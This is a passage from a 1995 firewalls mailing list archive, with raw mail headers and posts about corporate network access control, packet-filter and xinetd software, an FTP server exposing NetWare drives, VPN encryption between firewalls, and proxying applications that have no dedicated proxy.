4, 95 12:27:22 pm X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 2631 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Can corporate network management actually dictate a policy and make it > stick? Once upon a time, MIS departments dictated that all computers > would be bought through them. Then along came minis and micros. > Today, almost anyone can implement a LAN by visiting the local PC > mart. If a system is within a department's budget and it visibly > contributes to the corporation's success, no policy is going to unplug > it. If dialins or Web pages make them seriously more successful, > corporate network management won't be able to do a thing, even if > it violates policy. > > Data security is built (or skewered) on three prongs: mission, > threats, and countermeasures. The organization of interest has a > "mission" like "build widgets" and its information resources are > subject to a variety of threats. As you pile on countermeasures you > reduce the threats, often at the expense of the organization's primary > mission. At some point security countermeasures are too expensive > relative to the level of threat or they too seriously degrade the > primary mission. In practice, security provides deterrence. > I have no disagreement with the latter portion of your point(s), however, I do have a few comments on the former. My point about centralized network 'management' is still the point I'm trying to get across. For instance, if a corporation has five subsidiaries located on five different locations around the world, a centralized network engineering, design & management function should be in place. This could also be the activity that accomodates access control to various gateways within the network to & from resources dispersed throughout. This is really the only sane way to approach this type of access control. If each subsidiary & division maintains their own access control at the gateway, it could prove to be a comedy of errors, rarely effective and somewhat (if not majorly) inhibitive. Of course, if each division maintains their own Internet gateway, then this is another kettle of fish altogether, however the thrust of this discussion is geared towards access control within private networks and seperation of resources within this environment. This type of policy must be dictated by Corporate MIS or Corporate Security. My $.02. - paul _______________________________________________________________________________ Paul Ferguson US Sprint tel: 703.689.6828 Managed Network Engineering internet: paul@hawk.sprintmrn.com Reston, Virginia USA http://www.sprintmrn.com From firewalls-owner Fri May 5 00:39:09 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA04225 for firewalls-outgoing; Fri, 5 May 1995 00:36:58 -0700 Received: from merlion.singnet.com.sg (merlion.singnet.com.sg [165.21.1.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA04220 for ; Fri, 5 May 1995 00:36:54 -0700 Received: (from lorna@localhost) by merlion.singnet.com.sg (8.6.11/8.6.11) id PAA07721; Fri, 5 May 1995 15:37:03 +0800 Date: Fri, 5 May 1995 15:37:02 +0800 (SST) From: Lorna Leong Subject: Re: Message from China To: ZSJABBOTT@EXPRESS.CCCCD.EDU cc: firewalls@GreatCircle.COM In-Reply-To: <01HQ3UXDXHB691VTP7@EXPRESS.CCCCD.EDU> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, > Is the message from China concerning ZHU Ling's sickness a > valid message? > > I received the message via the firewall's listserv. I think it probably is because I read something about it in the newspapers before receiving the message over the weekend. Apparently, some doctors are helping her now. I can't remember the details. Lorna (ps. sorry that this has got nothing to do with Firewalls.) From firewalls-owner Fri May 5 03:09:13 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA06772 for firewalls-outgoing; Fri, 5 May 1995 03:05:15 -0700 Received: from oznet02.ozemail.com.au (oznet02.ozemail.com.au [203.2.192.124]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA06767 for ; Fri, 5 May 1995 03:05:10 -0700 Received: from sldar1p01.ozemail.com.au (sldar1p01.ozemail.com.au [203.7.177.17]) by oznet02.ozemail.com.au (8.6.10/8.6.5) with SMTP id UAA05720 for ; Fri, 5 May 1995 20:05:21 +1000 Message-Id: <199505051005.UAA05720@oznet02.ozemail.com.au> From: "Andrew Exley" To: firewalls@greatcircle.com Date: Fri, 5 May 1995 19:28:14 +0730 Subject: Reply-to: exleya@ozemail.com.au X-Confirm-Reading-To: exleya@ozemail.com.au X-pmrqc: 1 Priority: normal X-mailer: Pegasus Mail/Windows (v1.22) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk uns firewalls From firewalls-owner Fri May 5 04:09:20 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA07231 for firewalls-outgoing; Fri, 5 May 1995 03:44:00 -0700 Received: from cpccux0 (cpccux0.cityu.edu.hk [144.214.5.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id DAA07226 for ; Fri, 5 May 1995 03:43:41 -0700 Received: from cpccux1.cpuxsvr1.cphk by cpccux0 (5.0/SMI-SVR4) id AA23283; Fri, 5 May 1995 18:42:24 +0800 Received: by cpccux1.cpuxsvr1.cphk (5.0/SMI-SVR4) id AA13401; Fri, 5 May 1995 18:42:25 +0800 Date: Fri, 5 May 1995 18:42:24 +0800 (HKT) From: Ivan Kaan <94165200@cpccux0.cityu.edu.hk> X-Sender: 94165200@cpccux1 To: firewalls@GreatCircle.COM Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Length: 18 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk uns firewalls From firewalls-owner Fri May 5 05:09:11 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA07941 for firewalls-outgoing; Fri, 5 May 1995 04:58:06 -0700 Received: from hal.stat.unipd.it (hal.stat.unipd.it [147.162.35.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA07936 for ; Fri, 5 May 1995 04:58:02 -0700 Received: by hal.stat.unipd.it (8.6.11/1.34) id NAA13291; Fri, 5 May 1995 13:57:29 +0200 From: danny@hal.stat.unipd.it (Danilo Selvestrel) Message-Id: <199505051157.NAA13291@hal.stat.unipd.it> To: firewalls@GreatCircle.COM Date: Fri, 5 May 1995 13:57:29 +0200 (MET DST) X-Mailer: ELM [version 2.4 PL22] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 15 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk uns firewalls From firewalls-owner Fri May 5 07:09:40 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA08998 for firewalls-outgoing; Fri, 5 May 1995 06:41:35 -0700 Received: from all.net (all.net [204.7.229.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA08987 for ; Fri, 5 May 1995 06:41:31 -0700 From: fc@all.net (Dr. Frederick B. Cohen) Received: by all.net (4.1/3.2.012693-Management Analytics); id AA07876 for firewalls@greatcircle.com; Fri, 5 May 95 09:37:37 EDT Message-Id: <9505051337.AA07876@all.net> Subject: no subject (file transmission) To: firewalls@greatcircle.com Date: Fri, 5 May 1995 09:37:37 -0400 (EDT) X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 369 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The American Society for Industrial Security's (ASIS) Security Management Magazine is now making select articles available on an experimental basis over World Wide Web. This WWW area is still under development, but you might want to read a fine article about the problems of erasing electromagnetic media no on-line in this area. The URL is: http://all.net:8080 From firewalls-owner Fri May 5 07:55:14 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA09684 for firewalls-outgoing; Fri, 5 May 1995 07:30:39 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA09670 for ; Fri, 5 May 1995 07:30:34 -0700 Message-Id: <199505051430.HAA09670@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA172504325; Sat, 6 May 1995 00:32:05 +1000 From: Darren Reed Subject: Re: mirror site(s) for ip_fil2.5.2 ? To: firewall@virtual.cuc.ab.ca (Firewall mailing list) Date: Sat, 6 May 1995 00:32:05 +1000 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <9505031450.AA14789@virtual.cuc.ab.ca> from "Firewall mailing list" at May 3, 95 08:50:19 am X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 490 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Firewall mailing list, they said: > > i am interested in inspecting ip_fil2.5.2, but can never seem to get on to > the anonymous server at coombs.anu.edu.au. are there mirror sites for > this package, or failing that, can some kind soul email me aforementioned > package? wu-ftpd and hp-ux...gotta luv it...anyone know how to stop hanging ftpd's ? try cheops.anu.edu.au/cephron.anu.edu.au also (same ftp dir. structure). But try coombs first (in preference). darren From firewalls-owner Fri May 5 08:09:47 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA09887 for firewalls-outgoing; Fri, 5 May 1995 07:41:16 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA09881 for ; Fri, 5 May 1995 07:41:10 -0700 Message-Id: <199505051441.HAA09881@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA173574984; Sat, 6 May 1995 00:43:04 +1000 From: Darren Reed Subject: Re: packet filtering software To: Maurice.Yergeau@Toro.Com Date: Sat, 6 May 1995 00:43:04 +1000 (EST) Cc: firewalls@greatcircle.com In-Reply-To: from "Maurice.Yergeau@Toro.Com" at May 3, 95 08:11:00 am X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 712 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Maurice.Yergeau@Toro.Com, they said: > > I am looking for some software to do packet filtering that will run on a sunos > box. I was told that TIS toolkit did this sort of thing but can't find it in > the documentation. Does anyone know if TIS does packet filtering or of some > software that does? > > any help is greatly appreciated. > Checkout coombs.anu.edu.au:/pub/net/kernel/ip_fil2.5.2.tar.gz It is a loadable-kernel module IP filter, with modifications needed to the kernel. FULL SOURCE code is included, even replacment bits for the SunOS 4.1.x kernel (code is deried from mixing Net-1 and Net-2/3 BSD). I use it on a sparc2 running 4.1.3_U1 with no troubles. cheers, darren From firewalls-owner Fri May 5 09:09:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10890 for firewalls-outgoing; Fri, 5 May 1995 08:47:46 -0700 Received: from zzyzx.com (zzyzx.zzyzx.com [192.215.182.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA10883 for ; Fri, 5 May 1995 08:47:41 -0700 Received: by zzyzx.com (4.1/CERF0.9:SMI-4.1) id AA11419; Fri, 5 May 95 08:45:54 PDT From: rodney@zzyzx.com (Rodney P. Rutherford) Message-Id: <9505051545.AA11419@zzyzx.com> Subject: Re: Life, and xinetd To: chuck@telebase.com (Chuck Murcko) Date: Fri, 5 May 1995 08:45:53 -0700 (PDT) Cc: firewalls@greatcircle.com In-Reply-To: <199505041836.OAA15618@telebase.com> from "Chuck Murcko" at May 4, 95 02:36:46 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1584 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > On another note, I have ported xinetd.2.1.4 to BSDI and Linux. It should > be possible to build it for FreeBSD and NetBSD also. I won't waste time > and bandwidth running the README out to all, as you can find it at > ftp.bsdi.edu and sunsite.unc.edu in those sites' incoming directories > as xinetd.2.1.4-bsdi.1.tar.gz and xinetd.2.1.4-linux.1.tar.gz, respectively. > Suffice it to say that xinetd is a beefed-up inetd with access control, > logging, etc. etc., originally written for SunOS 4.x and Ultrix 4.x by > Panagiotis Tsirigotis. > > Thanks for your patience, Brent. > > chuck > Chuck Murcko Telebase Systems, Inc. Wayne PA chuck@telebase.com > And now, on a lighter note: > I tried to think of some self- and company-promoting advertising to put here, > but I couldn't. > Hi Chuck, A clarification for everyone: ftp.bsdi.edu should be ftp.bsdi.com The bsd file is now located in /contrib/networking/xinetd.2.1.4-bsdi.tar.gz I did not find either file on sunsite.unc.edu? I myself have just installed NetBSD on a PC at home. Over the next few weeks (months :->) I hope to have it fully configured along with XFree86 and PPP, at which time I will setup some semblence of a firewall/filters between home and work. When I do, I will test out the Xinetd port. If anyone gets there before I do, please let us know how it goes. Thanks, Rodney -- | Rodney P. Rutherford Zzyzx Workstation Peripherals 619-558-7800 | | Technical Director 5893 Oberlin Drive 800-876-7818 | | rodney@zzyzx.com San Diego, CA. 92121 FAX: 619-558-8283 | From firewalls-owner Fri May 5 10:40:43 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA12633 for firewalls-outgoing; Fri, 5 May 1995 10:12:41 -0700 Received: from gold.chem.hawaii.edu (gold.chem.Hawaii.Edu [128.171.55.9]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA12627 for ; Fri, 5 May 1995 10:12:38 -0700 Received: by gold.chem.hawaii.edu (4.1/gold-MX-1.9) id AA04275; Fri, 5 May 95 07:12:18 HST Date: Fri, 5 May 1995 07:10:31 -1000 (HST) From: NetSurfer Subject: Re: PC site security To: "S. Alexander Jacobson" Cc: Gil Tennant , firewalls@GreatCircle.COM In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 4 May 1995, S. Alexander Jacobson wrote: > NetManage Chameleon packages an FTPd with their Internet client > software. I haven't tried doing this with chameleon but...If you're > employer is running the FTP'd and has private netware drives mounted, > then anyone who hacks through the ftpd gets access to those private > directories. This was fixed in v. 4.5 and their ftp & ftpd's have built in proxy support as an option you can configure from a menu. -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer@sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> From firewalls-owner Fri May 5 11:29:35 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA13183 for firewalls-outgoing; Fri, 5 May 1995 10:47:18 -0700 Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA13178 for ; Fri, 5 May 1995 10:47:15 -0700 Received: from rssi by relay1.UU.NET with SMTP id QQyolb29428; Fri, 5 May 1995 13:47:41 -0400 Received: from pail.rssi.com by rssi (4.1/SMI-4.1) id AA01599; Fri, 5 May 95 13:45:26 EDT Received: by pail.rssi.com (5.0/SMI-SVR4) id AA03008; Fri, 5 May 1995 13:46:54 +0500 Date: Fri, 5 May 1995 13:46:54 +0500 From: bvvanor@rssi.rssi.com (Brad VanOrden) Message-Id: <9505051746.AA03008@pail.rssi.com> To: firewalls@greatcircle.com Subject: WANG TIU Content-Length: 577 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As a follow-up to my previous post about the WANG Trusted Interface Unit (TIU), I have to appologize that I did not make it clear that this device can only be used when authorized by NSA. This is essentially the US intelligence community, its contractors, and related foreign intelligence communities. The POC info again is: A. Ann Horton Wang Laboratories, Inc 7500 Old Georgetown Road Bethesda, MD 20814-6198 U.S.A. Phone: 301-657-5267 or 657-5000 FAX: 301-657-5322 Again, my apologies if I mislead anyone. Have a good week-end! Brad Van Orden Rapid Systems Solutions From firewalls-owner Fri May 5 11:40:00 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA13333 for firewalls-outgoing; Fri, 5 May 1995 10:58:56 -0700 Received: from virtual.office.com (welcome.vo.com [204.192.49.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA13328 for ; Fri, 5 May 1995 10:58:51 -0700 Received: (from alex@localhost) by virtual.office.com (8.6.12/8.6.12) id NAA00907; Fri, 5 May 1995 13:59:29 -0400 Date: Fri, 5 May 1995 13:59:28 -29900 From: "S. Alexander Jacobson" Subject: Re: PC site security To: NetSurfer cc: Gil Tennant , firewalls@GreatCircle.COM In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 5 May 1995, NetSurfer wrote: > On Thu, 4 May 1995, S. Alexander Jacobson wrote: > > > NetManage Chameleon packages an FTPd with their Internet client > > software. I haven't tried doing this with chameleon but...If you're > > employer is running the FTP'd and has private netware drives mounted, > > then anyone who hacks through the ftpd gets access to those private > > directories. > > This was fixed in v. 4.5 and their ftp & ftpd's have built in proxy > support as an option you can configure from a menu. What do you mean fixed? Suppose I have NetWare mounted from DOS a I run Chameleon in Windows. Does Chamleon ftpd block me from mounting netware directories? Even if the firewall restricts ftp access to only a certain set of external IP's. The local sec admin must still remember that the NetWare drive is not safe just because the netware server isn't running ftpd. -Alex- _____________________________________________________________________________ S. Alexander Jacobson Internet Virtual Office Inc. alex@virtual.office.com Consulting info@virtual.office.com http://vo.com/people/alex/ ** http://virtual.office.com 1-212-799-2645 voice Technology gopher.virtual.office.com 1-212-799-1075 fax Strategy telephone: 1-800-TODAY-VO From firewalls-owner Fri May 5 15:39:33 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA17085 for firewalls-outgoing; Fri, 5 May 1995 15:18:43 -0700 Received: from blackhole.milkyway.com (milkyway.com [198.53.167.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA17080 for ; Fri, 5 May 1995 15:18:39 -0700 Received: from localhost (uucp@localhost) by blackhole.milkyway.com (8.6.5/8.6.6) id SAA15659 for ; Fri, 5 May 1995 18:27:46 -0400 Received: from jupiter.milkyway.com(192.168.77.9) by internet.milkyway.com via smap (V1.3) id sma015655; Fri May 5 18:27:36 1995 Received: from metis.milkyway.com (mcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.7/8.6.6) with ESMTP id SAA18687; Fri, 5 May 1995 18:23:20 -0400 From: Michael Richardson Received: by metis.milkyway.com (8.6.9/BSDI-Client) id SAA08556; Fri, 5 May 1995 18:29:44 -0400 Date: Fri, 5 May 1995 18:29:44 -0400 Message-Id: <199505052229.SAA08556@metis.milkyway.com> To: mckenney@smiley.mitre.ORG Subject: Re: Firewall-to-Firewall Encryption Products Newsgroups: milkyway.mail.firewalls In-Reply-To: Organization: Milkyway Networks Corporation Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article you write: >Milkyway Black Hole > - Supports modified (proprietary) DES algorithm (DES++). This is DES with some trivial obscuring code, we haven't modified the code code. We would like to support GSSAPI on top of a swIPe-like facility, but since swIPe doesn't define any standard encryption yet, we are waiting for an available commercial GSSAPI. (e.g. NT Entrust) I suspect this will be the solution for interoperability. >configuration is the same at each of the nodes. At the present time, a >user must go through a challenge/response sequence at each firewall. The >customer is exploring security technologies that could eliminate the need >for a challenge/response dialogue at each firewall. Essentially all virtual private network software winds up doing a small amount of packet filtering/routing to get the packets to the remote network to go through the encryption engine. In Black Hole, if you decide *not* to trust the packets coming from the "encrypted virtual interface", then they don't get routed, and must pass through the normal Black Hole proxies. e.g. branch office can login to HQ, but they must authenticate, and their packets get encrypted so no one can hijack the connection. Or, you can just route the packets. -- :!mcr!: | Milkyway Networks Corporation Michael Richardson | Makers of the Black Hole firewall NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com Home: mcr@sandelman.ocunix.on.ca. PGP key available. From firewalls-owner Sat May 6 08:39:08 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA25203 for firewalls-outgoing; Sat, 6 May 1995 08:18:57 -0700 Received: from moose.usmcs.maine.edu (moose.usmcs.maine.edu [130.111.131.39]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA25198 for ; Sat, 6 May 1995 08:18:54 -0700 Received: by moose.usmcs.maine.edu (5.57/Ultrix3.0-C) id AA21038; Sat, 6 May 95 11:19:43 -0400 Received: by doc.usmcs.maine.edu; (5.65/1.1.8.2/28Mar95-0848PM) id AA07745; Sat, 6 May 1995 11:19:23 -0400 From: Edward Maillet Message-Id: <9505061519.AA07745@doc.usmcs.maine.edu> Subject: What if I don't have a proxy for my application? To: firewalls@greatcircle.com Date: Sat, 6 May 1995 11:19:23 -0400 (EDT) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 683 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hey All, How do application level firewalls (e.g. BlackHole) handle applications that don't have a proxy program written for them? For example, if my company (me.com) needs to provide an application (datascan) for our R & D dept that allows users to use a database that another company (datascan.com) has on the net. Datascan.com gives us the datascan app that runs on a PC under windows and connects us to their database. If we (me.com) want to use an application firewall can we still use the datascan app even if the firewall has no datascan proxy? And to make things more interesting the internal PC is using RFC 1597 IP addresses. ----- Ed Maillet maillet@usmcs.maine.edu From firewalls-owner Sat May 6 10:39:11 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA26170 for firewalls-outgoing; Sat, 6 May 1995 10:09:43 -0700 Received: from noc1.mid.net (noc1.mid.net [198.247.250.15]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA26165 for ; Sat, 6 May 1995 10:09:40 -0700 Received: from jayhawk.mid.net (jayhawk.mid.net [198.247.250.21]) by noc1.mid.net (8.6.10/8.6.9) with ESMTP id MAA00649; Sat, 6 May 1995 12:10:04 -0500 Received: (from alan@localhost) by jayhawk.mid.net (8.6.10/8.6.9) id MAA26513; Sat, 6 May 1995 12:10:21 -0500 From: Alan Hannan Message-Id: <199505061710.MAA26513@jayhawk.mid.net> Subject: Re: What if I don't have a proxy for my application? To: maillet@doc.usmcs.maine.edu (Edward Maillet) Date: Sat, 6 May 1995 12:10:20 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9505061519.AA07745@doc.usmcs.maine.edu> from "Edward Maillet" at May 6, 95 11:19:23 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1716 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > How do application level firewalls (e.g. BlackHole) handle applications > that don't have a proxy program written for them? Typically they use something that creates a proxy which acts as though it were a packet filter. However, it's not a packet filter, it receives the incoming packet, checks the originating address, destination address, and port number against a ruleset, then acts accordingly, forwarding the packet, or dropping the packet. Actually, the port number is acted on earlier by inetd or something similar, which then spawns the "plug-gw". Correspondingly, the packet that is resent has an originating address of the firewall, as opposed to the originating node. > For example, if my company (me.com) needs to provide an application > (datascan) for our R & D dept that allows users to use a database that > another company (datascan.com) has on the net. Datascan.com gives us the > datascan app that runs on a PC under windows and connects us to their > database. If we (me.com) want to use an application firewall can we still > use the datascan app even if the firewall has no datascan proxy? And to > make things more interesting the internal PC is using RFC 1597 IP addresses. It is definitely possible for you to do this with a proxy fw. There are some potential concerns regarding the kind of transport used by the application. Does it run over tcp or udp? I do not believe that TIS's fwtk allows udp, but I may well be wrong. Would someone be kind enough validate or correct me? -- alan@mid.net, (402) 472-0241 (voice) Networked Systems Administrator (402) 472-0240 (fax) MIDnet, the United States Oldest Regional Internet Service Provider http://www.mid.net/ From firewalls-owner Sat May 6 10:51:36 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA26264 for firewalls-outgoing; Sat, 6 May 1995 10:19:50 -0700 Received: from clark.net (clark.net [168.143.0.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA26259 for ; Sat, 6 May 1995 10:19:47 -0700 Received: (hcb@localhost) by clark.net (8.6.12/8.6.5) id NAA00687; Sat, 6 May 1995 13:11:36 -0400 From: Howard Berkowitz Message-Id: <199505061711.NAA00687@clark.net> Subject: Re: Source Code To: phil@netpart.com (Phil Trubey) Date: Sat, 6 May 1995 13:11:36 -0400 (EDT) Cc: padgett@tccslr.dnet.mmc.COM, firewalls@GreatCircle.COM In-Reply-To: <199505041530.IAA29745@lykos.netpart.com> from "Phil Trubey" at May 4, 95 08:30:20 am X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 2752 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Phil writes (I think)... > > There are other ways of providing the same functionality - BorderWare has a > user-controllable (ie. you can turn on and off this feature via the console, > by default it is off) back door that allows the developers to effectively > telnet into the firewall (which can be initiated only via a certain IP > address, and only using strong authentication) over the net and see what's > wrong with a firewall. Patches can be downloaded from the net (patches > are cryptographically checksummed, of course) by end users and a console > menu selection is used to apply them (the patch update code brings the > machine down to a single user, non-network listening mode, applies the > patches and reboots). Your point reminded me of an idea with which I have been playing: managing firewalls using SNMP and a to-be-developed Firewall MIB. Before the flamethrowers go on, let's assume that we are using an acceptably authenticated path for the SNMP flow. Whether this is SNMPv2, link encryption, etc., is irrelevant for the immediate discussion. What I'd like the list to consider are what are the abstract mechanisms that reside on firewalls (including bastion hosts, screening routers, etc.). These abstractions are what a MIB would describe. We would then have the potential, to some extent, of firewall-vendor-independent management of the firewall. We also may have a standard metanotation for describing at least a core set of firewall functions. My initial thought would to be modelling both packet forwarding and proxy mechanisms as extensions of the basic IP routing table MIB. There would also be switch variables for log and alarm mechanisms. > > I realize that trusting a vendor to have good support policies is always > an act of faith, but BorderWare (and other firewall vendors, I might add) > have an open user mailing list that users can gripe about bad support to. > > >The point is that in a dynamic environment a customer may not be able to wait > >for the next version and at the same time, the vendor may not have the > >available resources (equipment and manpower) to be able to recreate it. A MIB dump -- of the firewall MIB and possibly associated host and router MIBs -- might make a very useful support tool. Howard PS---I will be going into the hospital for a week of personal diagnostics on Sunday, and am not sure if I will have email access from there. I won't be ignoring the discussion! I'll definitely return to the discussion when NIH lets me out, or if I can get connectivity. My Powerbook is, at the moment, in its ultimate security mode -- needing to go back in for repair. Complain all you like about software; there's nothing like a beta test on your body! :-) From firewalls-owner Sat May 6 11:39:08 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA27243 for firewalls-outgoing; Sat, 6 May 1995 11:30:38 -0700 Received: from gatekeep.genmagic.com (gatekeep.genmagic.com [192.216.16.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA27238 for ; Sat, 6 May 1995 11:30:35 -0700 Received: from (genmagic.genmagic.com [10.1.4.12]) by gatekeep.genmagic.com (8.6.9/8.6.9) with SMTP id LAA02229; Sat, 6 May 1995 11:28:08 -0700 Received: from abulafia.genmagic.com by genmagic.genmagic.com (4.1/SMI-4.1/JBS) id AA05091; Sat, 6 May 95 11:29:37 PDT Received: by abulafia.genmagic.com (931110.SGI/930416.SGI) for @genmagic.genmagic.com:maillet@doc.usmcs.maine.edu id AA13385; Sat, 6 May 95 11:38:38 -0700 Date: Sat, 6 May 95 11:38:38 -0700 From: jet@abulafia.genmagic.com (J. Eric Townsend) Message-Id: <9505061838.AA13385@abulafia.genmagic.com> To: Alan Hannan Cc: maillet@doc.usmcs.maine.edu (Edward Maillet), firewalls@GreatCircle.COM Subject: Re: What if I don't have a proxy for my application? In-Reply-To: <199505061710.MAA26513@jayhawk.mid.net> References: <9505061519.AA07745@doc.usmcs.maine.edu> <199505061710.MAA26513@jayhawk.mid.net> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk "alan" == Alan Hannan writes: alan> Typically they use something that creates a proxy which acts alan> as though it were a packet filter. However, it's not a packet alan> filter, it receives the incoming packet, checks the originating alan> address, destination address, and port number against a ruleset, alan> then acts accordingly, forwarding the packet, or dropping the alan> packet. Actually, the port number is acted on earlier by inetd Isn't this just a fancy bridge, then? -- J. Eric Townsend vox #: USA 408.774.4252 work: jet@genmagic.com AT&T PersonaLink: A5803643645@attpls.net play: jet@well.sf.ca.us or get my card from directory information From firewalls-owner Sat May 6 12:39:13 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA28012 for firewalls-outgoing; Sat, 6 May 1995 12:35:29 -0700 Received: from jatoba.ufg.br ([200.9.68.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA27988 for ; Sat, 6 May 1995 12:33:50 -0700 Received: by jatoba.ufg.br (BOSX 3.2/UCB 5.64/4.03) id AA04837; Thu, 4 May 1995 13:57:30 -0300 Date: Thu, 4 May 1995 13:57:30 -0300 From: simone@jatoba.ufg.br (Simone Cintra Chagas - Adm. rede) Message-Id: <9505041657.AA04837@jatoba.ufg.br> To: Firewalls@GreatCircle.com Subject: Hackman Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm looking for Hackman.Please, if someone has it, send me. Thanks, Simone. From firewalls-owner Sat May 6 13:09:08 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA28528 for firewalls-outgoing; Sat, 6 May 1995 13:02:40 -0700 Received: from janus.dot.state.az.us (janus.dot.state.az.us [192.133.42.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA28523 for ; Sat, 6 May 1995 13:02:37 -0700 Received: by janus.dot.state.az.us (4.1/SMI-4.1) id AA19055; Sat, 6 May 95 13:03:01 MST Received: from pserv1.dot.state.az.us(162.59.10.28) by janus.dot.state.az.us via smap (V1.3) id sma019053; Sat May 6 13:02:36 1995 Received: by pserv1.dot.state.az.us (5.65c/1.921207) id AA26245; Sat, 6 